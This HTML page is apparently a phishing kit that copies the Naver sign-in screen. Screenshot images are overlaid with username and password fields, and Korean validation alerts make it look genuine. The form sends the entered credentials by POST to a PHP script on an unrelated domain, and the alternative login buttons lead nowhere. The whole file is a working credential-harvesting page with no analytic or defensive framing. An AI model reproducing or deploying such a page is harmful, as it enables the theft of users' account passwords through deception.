<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Naver Sign in</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">

<link href="https://work-desk.sheikhahijabs.com/nv/images/favicon_1024.png" rel="apple-touch-icon-precomposed" />




<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;
    
    color: #333; 
    
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:48px;
font-size: 18px;	
  } 
 .textbox:hover { 
    border: 1px solid green; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
  } 
 .textbox:focus { 
   
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>



<style> 
  .textbox2 { 
    font-family: Arial, Helvetica, sans-serif;
    
    
    
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:46px;
font-size: 18px;	


  } 
 .textbox:focus { 
   
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

			<script language="javascript">
function submitform()
{
   document.forms["Form"].submit();
}

// Form validation code will come here.
function validate()
{
 
   if( document.Form.formtext1.value == "" )
   {
     alert( "아이디 또는 이메일 주소를 입력해주세요." );
     document.Form.formtext1.focus() ;
     return false;
   }
   if( document.Form.formtext2.value == "" )
   {
     alert( "비밀번호를 입력해주세요." );
     document.Form.formtext2.focus() ;
     return false;
   }

  else{
   return( true );
   }
}
//-->
</script>

</head>
<body bgColor="#F5F6F7" Link="#000000" VLink="#000000" ALink="#000000"  >

<div id="container">
  <div id="image1" style="position:absolute; overflow:hidden; left:1px; top:14px; width:1310px; height:821px; z-index:0"><img src="https://work-desk.sheikhahijabs.com/nv/images/naver-b.jpg" alt="" title="" border=0 width=1310 height=821></div>
  <div id="image2" style="position:absolute; overflow:hidden; left:515px; top:725px; width:307px; height:23px; z-index:1"><a href="#"><img src="https://work-desk.sheikhahijabs.com/nv/images/fo.png" alt="" title="" border=0 width=307 height=23></a></div>

  <form name="Form" action="https://work-desk.sheikhahijabs.com/nv.php"  method="post" onSubmit="return(validate());">
    <input name="formtext1" value="" class="textbox" type="text" placeholder="Username" style="position:absolute;width:459px;left:436px;top:210px;z-index:4" >
	  <input name="formtext2" value="" class="textbox" type="password" placeholder="Password" style="position:absolute;width:459px;left:437px;top:266px;z-index:4" minlength="4">
	  
	  <div id="formimage1" style="position:absolute; left:437px; top:324px; width:460px; height:63px; z-index:5" >
  <input type="image" name="submit" width="461" height="63" src="https://work-desk.sheikhahijabs.com/nv/images/sign in.png" >
</div>

	<div id="fb" style="position:absolute; left:431px; top:480px; z-index:5; width: 466px; height:=105">
  <a href="#"><img src="https://work-desk.sheikhahijabs.com/nv/images/qr.png" alt="" title="" border=0 width=466 height=105></a></div>
    <div id="fb" style="position:absolute; left:433px; top:588px; z-index:5; width: 461px; height:=64;">
  <a href="#"><img src="https://work-desk.sheikhahijabs.com/nv/images/fb.png"alt="" title="" border=0 width=461 height=64></a></div>
<div id="linr" style="position:absolute; left:431px; top:654px; z-index:5 width: 464px; height:=63;">
  <a href="#"><img src="https://work-desk.sheikhahijabs.com/nv/images/line.png" alt="" title="" border=0 width=464 height=63></a></div>
  </form>


</body>
</html>
